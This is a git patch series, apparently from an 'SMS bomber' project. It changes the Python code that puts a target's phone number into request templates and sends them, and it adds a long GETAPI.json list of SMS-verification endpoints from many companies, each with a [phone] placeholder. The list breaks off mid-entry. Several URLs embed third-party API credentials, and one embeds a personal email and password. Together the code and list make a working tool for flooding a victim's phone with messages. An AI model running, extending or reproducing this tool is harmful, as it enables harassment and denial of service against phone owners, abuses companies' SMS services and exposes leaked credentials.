self.header = self.replace_data(self.header, phone) - + + self.header = self.replace_data(self.header, phone) + if not self.header.get('Referer'): + self.header['Referer'] = self.url # 增加 Referer + self.data = self.replace_data(self.data, phone) self.url = self.replace_data(self.url, phone) + # print(self) return self - diff --git a/smsboom.py b/smsboom.py index 4f27ddc..2b9c92e 100755 --- a/smsboom.py +++ b/smsboom.py @@ -100,7 +100,7 @@ def req(api: Union[API, str], phone: tuple): resp = client.get(url=api, headers=default_header) logger.info(f"GETAPI接口-{resp.text[:30]}") except httpx.HTTPError as why: - logger.error(f"{why.request.url}请求失败{why}") + logger.error(f"请求失败{why}") @click.command() diff --git a/utils.py b/utils.py index 17f1e0d..4dbafae 100755 --- a/utils.py +++ b/utils.py @@ -100,15 +100,19 @@ class API(BaseModel): :param API: one API basemodel :return: API basemodel """ - # 如果传入的 header 是字符串,就转为字典. # 仅仅当传入 phone 参数时添加 Referer + # fix: 这段代码很有问题....... if phone: + # 进入的 header 是个字符串 if self.header == "": self.header = {} self.header['Referer'] = self.url # 增加 Referer - else: - self.header = self.replace_data(self.header, phone) - + + self.header = self.replace_data(self.header, phone) + if not self.header.get('Referer'): + self.header['Referer'] = self.url # 增加 Referer + self.data = self.replace_data(self.data, phone) self.url = self.replace_data(self.url, phone) + # print(self) return self From fce31dd701248a50552073ef40483f99f39d4486 Mon Sep 17 00:00:00 2001 From: AdminWhaleFall Date: Wed, 4 May 2022 01:08:10 +0800 Subject: [PATCH 5/8] =?UTF-8?q?=F0=9F=90=9E=20fix:=20=E5=B7=B2=E7=9F=A5?= =?UTF-8?q?=E7=9A=84=E4=B8=80=E4=B8=AA=E5=BD=B1=E5=93=8D=E7=A8=8B=E5=BA=8F?= =?UTF-8?q?=E7=9A=84bug?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit httpx 模块的 data 和 json 参数.有些服务器无法解码 json 数据只接受简单的表单,但是处理apis时把data都变成 dict 判断无意义。[stackoverflow](https://stackoverflow.com/questions/26685248/difference-between-data-and-json-parameters-in-python-requests-package) --- flask_app/utils.py | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/flask_app/utils.py b/flask_app/utils.py index ffe3691..d828148 100755 --- a/flask_app/utils.py +++ b/flask_app/utils.py @@ -1,6 +1,6 @@ # encoding=utf8 import httpx -import json +# import requests from .model import API, default_header @@ -12,6 +12,10 @@ def test_resq(api: API, phone) -> httpx.Response: """ api = api.handle_API(phone) with httpx.Client(headers=default_header, timeout=8) as client: + # 这个判断没意义.....但是我不知道怎么优化... + # https://stackoverflow.com/questions/26685248/difference-between-data-and-json-parameters-in-python-requests-package + # Todo: json 和 data 表单发送的问题,有些服务器不能解释 json,只能接受表单 + # sol: 1. 添加额外字段判断... if not isinstance(api.data, dict): print("data") resp = client.request(method=api.method, headers=api.header, @@ -20,6 +24,16 @@ def test_resq(api: API, phone) -> httpx.Response: print('json') resp = client.request( method=api.method, headers=api.header, url=api.url, json=api.data) + + # 验证不是 httpx 的问题... + # if not isinstance(api.data, dict): + # print("data") + # resp = requests.request(method=api.method, headers=api.header, + # url=api.url, data=api.data) + # else: + # print('json') + # resp = requests.request( + # method=api.method, headers=api.header, url=api.url, json=api.data) return resp From 0edb905012e31af80b7823b58e5766635d8609ff Mon Sep 17 00:00:00 2001 From: FannieMC <73371677+FannieMC@users.noreply.github.com> Date: Sun, 8 May 2022 23:35:57 +0800 Subject: [PATCH 6/8] Update GETAPI.json --- GETAPI.json | 5645 ++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 5644 insertions(+), 1 deletion(-) diff --git a/GETAPI.json b/GETAPI.json index 69b6001..c612ae0 100755 --- a/GETAPI.json +++ b/GETAPI.json @@ -1 +1,5644 @@ -["http://101.132.126.166:8080/message/sendVerifyCode?callback=successCallback&mobilePhone=&t=1589625247333action_type=regist&mobile=[phone]", "http://1314.buzz/index.php?hm=[phone]", "http://1314.buzz:80/index.php?hm=[phone]", "http://19.offcn.com/send_message/seccode/?0.8413693207408235&msgpic=user=[phone]", "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", "http://218.57.131.146/cwbase/ep/handlers/RouteHandler.ashx?action=GetPhoneVerCode&PhoneNum=action=GetPhoneVerCode&PhoneNum=[phone]", "http://221.179.180.158:9008/HttpQuickProcess/submitMessageAll?OperID=zjawu&OperPass=AqBTaIWp&DesMobile=[phone]", "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO+6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC+/CA&phone=[phone]", "http://account.ilongyuan.com.cn/index.php?s=/home/user/verify.html&random=0.8012450194754068&client_id=&verify=[phone]", "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]", "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", "http://api.duo17.com/sendsms.do?os_type=android&app_version=2.4.0.0&device_id=860903034476097&pnum=[phone]", "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", "http://api.gaotu100.com/user/v2/send_passcode?captcha_mode=NETEASE&type=3&mobile=[phone]&code_type=0", "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=+86&mobile=[phone]", "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=+86&mobile=[phone]", "http://api.hhyp58.com/basis/sendCheckCode?mobile=[phone]", "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone6S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]", "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]", "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]", "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]", "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=+86[phone]", "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", "http://api.qingmang.me/v1/account.sendVerification?token=&phone=%2B86[phone]&code=70428334", "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]", "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]&content={%22code%22:%22HQ98B%22}", "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", "http://api.v2.msparis.com/common/mobile?channel=AppStore-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]", "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]", "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", "http://api.yinka.co/common/sms?cellphone=[phone]", "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]", "http://app.ftutj.cn/web/api.php?s=/Join/verify/?0.24206258677631287&picCode=[phone]", "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]", "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data={'phone':'[phone]", "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", "http://bdp.haoyisheng.com/bdp/checkCode/getChkCode?timestamp=1600272327075mobileNum=[phone]", "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi4A&osLevel=23&phone=[phone]", "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]&token=", "http://cd.abiz.com/v3validcode?t=1604046053252¤tFindType=1&pageType=7&pn=abiz&validateCode=currentFindValue=[phone]", "http://center.siyi.cn/process.aspx?c=sendvcode&vt=sms&va=reg&mobile=[phone]", "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", "http://codingle.cn/api/user/register/tel_verify?tel=[phone]", "http://ct.ctrip.com/me/register/Verify?name=%E5%90%B4%E5%A5%87&email=357058116%40qq.com&mobile=[phone]&passwd=xiyu8187", "http://cuckooshop.cn/SMS?phone=[phone]", "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]", "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]", "http://edms.fcbox.com/hibox/weixin/getVerifyCode?mobilePhone=[phone]", "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]", "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]", "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", "http://gj.liansuosoft.com/ShopRegister/VCode?rand=0.3306040567511852&code=[phone]", "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]", "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]", "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]", "http://haojue78.com/WS/WSAccount.asmx/SendMobileMsg?mobile=[phone]", "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]", "http://hdh.10086.cn/common/validationIP?phone=[phone]", "http://hyuser.91huayi.com/ashx/sendSmsValidateCode.ashx?mobile=[phone]", "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]", "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", "http://iclass.ruijie.com.cn/icmgr/rest/techReg/sms?timeStamp=1605428709505&phoneNo=[phone]", "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]", "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", "http://jzplatform.com/distributor/sendcode_do.phpe.account=[phone]", "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]", "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", "http://ld.liandan100.com/ldmgr/api/user/sendVerifySms?platform=1&versionNum=53&&r=&partnerId=[phone]", "http://liuyan.people.com.cn/verifycode/rand4?t=1603181060151&verCode=phoneNum=[phone]", "http://lndx.edu.cn/Third/Mobile_SMS?Mobile=[phone]&beCallPhone=15810904000", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]", "http://m.egou.com/validate_phone.htm?phone=[phone]", "http://m.fanli.com/invite/sendverifycode?jsoncallback=jsonp2&pos=601&t=1488608297799&mobile=[phone]", "http://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", "http://m.huibo.com/register/getAuthCode?txtPhone=[phone]", "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", "http://m.jiguo.com/mb/api/validatecode/color/mb.html?d=0.7554753933168952&vcode=tel=[phone]", "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]", "http://m.robotest.cn/user/sms.html?tel=[phone]", "http://m.sjingbang.com/api/app/sendSmsCode%2522,%2522rediskey%2522:%2522AppRegValidate%2522,%2522gjdqCode%2522:%252286%2522%257D&_1600248070800=[phone]", "http://m.tk.cn/tkmobile/service/member?function_code=dynamicLogin&login_mobile=[phone]", "http://m.xymens.com/index.php/Home/User/send_code?mobile=[phone]", "http://m.yst.com.cn/pc/code/phone/regist?phone=[phone]", "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", "http://maintain.yunzhandata.com/internal/customer/sendcode.json?mobile=[phone]", "http://mall.95572.com/mobile/member/register/web/captcha?mobile=[phone]", "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", "http://manage.univisa.cn/posts/random?callback=jQuery111308764434818808016_1596972033456&phone=target=mobile&mobile=[phone]", "http://meeting.csco.org.cn/Admin/VerificationCode/?type=1&v=1&id=1&email=&checkcode=ipass=0&mobile=[phone]", "http://member.ehaier.com/sendMobileSmsVerify.html?mobile=[phone]", "http://member.for68.com/member/consult/sendRandcode.shtm?mobilePhone=[phone]", "http://member.med66.com/uc/smscode?phone=[phone]", "http://mkxq.zymk.cn/user/v1/mobilevc/?callback=jQuery321016123103253181426_1503210785449&mobile=[phone]&service=mkn&_=1503210785451", "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", "http://my.baihe.com/Getinterregist/getPhoneVerifyCode?jsonCallBack=jQuery18306001467584540825_1439706800918&type=2&phone=[phone]&_=1439707017074", "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]", "http://open.leju.com/game/member/sendcode.html?phone=[phone]", "http://open.zhundao.com.cn/api/v2/senCode?&phoneOrEmail=[phone]", "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", "http://passport.12371.cn/security/getMobileCode?type=regist&mobile=[phone]", "http://passport.17house.com/login/sendSMSForMobileLogin?mobile=[phone]", "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", "http://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.020283224898892227?mobileNo=[phone]&geetest_challenge=&geetest_validate=&geetest_seccode=", "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=773", "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", "http://passport.ctrl.cn/sms/reg?mobile=[phone]", "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947590&Service=home-club-web&backurl=&mobilephone=[phone]", "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947591&Service=home-club-web&backurl=&mobilephone=[phone]", "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]&mobilestep=1&verification_code=&verify_flag=&verify_global=ma624mg0j80trr7ldvwcl15c1f&c_aver=1.0&c_src=2&c_v=5.3.1.24&devid=63599267906091", "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]&appId=www_home&v=2&sig=&t=1592615855903&v=2", "http://quan.lukou.com/api/sms/verification_code?phone=[phone]", "http://readapp.ddyvip.cn/app/user/sendLoginCode.api?appVersion=2.4.4&inviteCode=&mobile=[phone]", "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", "http://ruzhu.jd.com/user/sendVC?phone=[phone]", "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", "http://shop.shtv.net.cn/ShopWeb/Ajax/ChkSMSCode.ashx?t=0.016637186912638713&MobileCode=&type=user-registerphoneNo=[phone]", "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]", "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", "http://sso1.nlc.cn/sso/currency/sendCodeToMobile?mobile=[phone]", "http://store.ncpa-classic.com/api/comm/smsNew?callback=jQuery17202866925711954793_1605436223502&mobile=[phone]", "http://survey.dxy.cn/forms/public/survey2/captcha?sid=102998&itemid=127053&phone=[phone]", "http://tel.kuaishang.cn/cl.php?tel=[phone]", "http://tools.wx6.org/dianhuahongzhaji/?telcode=[phone]", "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]", "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone6s-12.4&login=[phone]", "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]&app_code=ECS-2233&msg_type=01", "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", "http://user.daojia.com/mobile/getcode?mobile=[phone]", "http://user.daojia.com/user/getSmscode?mobile=[phone]", "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", "http://v.juhe.cn/sms/send?mobile=[phone]", "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=", "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", "http://vip.timesawards.com/Method/getAuthCode?target=[phone]", "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]", "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", "http://wap.10010.com/mobileService/tuiguang/sendMsg.htm?mobileNumber=[phone]", "http://wap.ghs.net/wap/wxregister-checkMobile.html?uname=[phone]", "http://web.5zhuan.com/?ac=getmsgcode&cphone=[phone]", "http://web.enjoysms.cn/do/safecode.do?0.4155260914653185&VerifyCode=[phone]", "http://weizhang.58.com/user/login/getcode?mobile=[phone]", "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]", "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&os=h5&_srcid=10000386", "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", "http://www.100ppi.com/ecp/ppi/get_sf/get_yzm.php?m=[phone]", "http://www.12chu.com/reg/sendCode.jhtml?mobile=[phone]", "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", "http://www.7881.com/img_valid.jsp?param=1557302312619&t=0&phone=act=reg&captcha=[phone]", "http://www.97sq.com/dx/index.php?hm=[phone]", "http://www.98xianyou.com/passport/sign/code.html?mobile=[phone]", "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]&callback=jQuery17209171715653229815_1599374652809&_=1599374671117", "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", "http://www.baixing.com/m/oz/verify/?fromS9=1&identity=[phone]&mobile=[phone]", "http://www.baixing.com/oz/verify/reg?mobile=[phone]", "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", "http://www.booms.ga/index.php?hm=[phone]", "http://www.booms.ga/mini/index.php?hm=[phone]", "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", "http://www.dye-ol.com/code/ValidCode.aspx?r=0.503437238889475&Code=3&UserID=0Mobile=[phone]", "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", "http://www.eyprint.com/include/getcode.php?telnum=[phone]", "http://www.fcbox.com/noshiro/retrievePhoneMessagePreventAttacks?mobilePhone=[phone]&smsType=5", "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]", "http://www.gmmc.com.cn/ajax/H5Handler.ashx?method=SendH5VerCode&mobile=[phone]", "http://www.gmsweipai.com/gms/api/common/[phone]", "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", "http://www.henhuoapp.com/api/method/getCode?phone=[phone]", "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", "http://www.hzrc.com/ww/b/a/wwba_sendMobileCode.html?phone=[phone]", "http://www.jc258.cn/signup/send_sms?mobile=[phone]", "http://www.jiedai315.com/SendCode.ashx?Mobile=[phone]&Identifier=6", "http://www.jiqinging.com/ajax.php?do=getCheckCode&tel=[phone]", "http://www.jiqinging.com/ajax.php?do=getCheckCode+tel=[phone]", "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]", "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]", "http://www.loho88.com/activ_check_mobile.php?activ_id=67&activ_type=mis&part_id=body_1_4&goods_id=100&is_new_customers_allow=0&phone=[phone]", 